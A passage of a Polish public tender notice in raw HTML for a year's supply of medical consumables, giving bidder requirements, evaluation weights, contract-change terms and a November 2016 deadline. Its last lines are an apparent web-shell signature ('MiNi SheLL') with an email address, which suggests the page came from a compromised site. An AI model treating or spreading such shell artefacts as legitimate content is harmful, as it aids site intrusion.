Wszystkie zaoferowane artykuły medyczne muszą posiadać ważne dokumenty dopuszczające do obrotu i używania oraz deklaracje zgodności CE stwierdzające zgodność z dyrektywą 93/42 EEC zgodnie z ustawą z dnia 20 maja 2010r. wyrobach medycznych(Dz.U. 107,poz.679), za wyjątkiem wyrobów medycznych klasy I i II a ,które zostały już wprowadzone do obrotu w innych krajach członkowskich UE lub EFTA i nie są objęte obowiązkiem zgłoszenia.
<br /><br /><b>II.5) Główny kod CPV: </b>33141000-0<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 12<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określił warunków w tym 
            zakresie.
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określił warunków w tym 
            zakresie.
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                O udzielenie zamówienia mogą ubiegać się 
            Wykonawcy, którzy zrealizowali w okresie ostatnich trzech lat przed upływem 
             terminu składania ofert minimum 2 dostawy na kwotę 300.000,00 zł. każda.
             W zakresie wykazania spełnienia przez  wykonawcę udziału w postępowaniu, należy 
              przedłożyć:
wykaz dostaw lub usług wykonanych, a w przypadku świadczeń okresowych lub 
ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie , wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie , przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />O udzielenie zamówienia mogą ubiegać się 
            Wykonawcy, którzy zrealizowali w okresie ostatnich trzech lat przed upływem 
             terminu składania ofert minimum 2 dostawy na kwotę 300.000,00 zł. każda.
             W zakresie wykazania spełnienia przez  wykonawcę udziału w postępowaniu, należy 
              przedłożyć:
wykaz dostaw lub usług wykonanych, a w przypadku świadczeń okresowych lub 
ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie , wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie , przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">W celu potwierdzenia braku podstaw do wykluczenia wykonawcy z postępowania, o których mowa w art. 24 ust. 1 pkt 23 ustawy wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej na której udostępniono SIWZ informacji o ofertach złożonych w postępowaniu zgodnie z art. 86 ust. 5, składa stosowne do treści art. 24 ust. 11 ustawy, oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, oraz w przypadku przynależności do tej samej grupy kapitałowej, dowody potwierdzające, że powiązania z innym wykonawcą ne prowadzą do zakłócenia konkurencji w postępowaniu.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Parametry jakościowe</td><td>20</td></tr><tr><td>Okes gwarancji niezmienności cen</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Strony dopuszczają możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty (w szczególności części dotyczącej przedmiotu umowy, terminów oraz wynagrodzenia), na podstawie, której dokonano wyboru Wykonawcy  w następującym zakresie:    
1)	Zmiany przywoływanych w przedmiotowej umowie ustaw oraz rozporządzeń, w przypadku uchwalenia nowych ustaw lub rozporządzeń mających odpowiednie zastosowanie (zmiany przepisów bądź wymogów szczególnych dotyczących przedmiotu zamówienia).
2)	Zmiany terminu wykonania przedmiotu zamówienia (terminu wynikającego z harmonogramu, terminu rozpoczęcia i zakończenia), w sytuacji gdyby wystąpiły okoliczności powodujące, że wykonanie zamówienia nie jest możliwe do wykonania w terminie, o którym mowa w SIWZ, z przyczyn leżących po stronie Dostawcy i Zamawiającego, przedłużenia się procedury przetargowej.
3)	Zmiany o charakterze niezależnym od stron, którego strony nie mogły przewidzieć przed zawarciem umowy, z uwagi na niezależne od stron okoliczności  siła wyższa. Za okoliczności siły wyższej uznaje się między innymi: pożar, powódź, huragan, eksplozję, awarie energetyczne, wojnę, operacje wojskowe, rozruchy, niepokoje społeczne, ograniczenia i zakazy wydane przez organy administracji publicznej, a także inne nadzwyczajne zjawiska losowe i przyrodnicze, wszystkie z nich powstające poza kontrolą Stron, których nie można było przewidzieć w chwili zawarcia umowy, a jeżeli możliwe były do przewidzenia nie można było im zapobiec. 
Zaistnienie siły wyższej powinno być udokumentowane przez Stronę powołującą się na nią.
4)	Strony umowy dopuszczają możliwość zmiany cen jednostkowych brutto w przypadku zmiany  stawki podatku  VAT,
5)	Ceny jednostkowe netto przedmiotu umowy mogą ulec zmianie po okresie niezmienności  ceny w przypadku zmiany  o (+, -) 10 % średniego kursu euro w odniesieniu do średniego kursu euro z dnia zawarcia umowy lub z dnia ostatniej zmiany ceny przedmiotu umowy w związku ze zmianą średniego kursu euro.
Średni kurs euro oznacza: oficjalny średni kurs wymiany EURO i Polskiego Złotego, który odpowiada kursowi średniemu pomiędzy oficjalnym kursem kupna i sprzedaży EURO i Polskiego Złotego ogłoszonym przez Narodowy Bank Polski. 

Zmiany zawartej umowy wymagają pisemnego uzasadnienia Zamawiającego. 
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 21/11/2016, godzina: 12:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com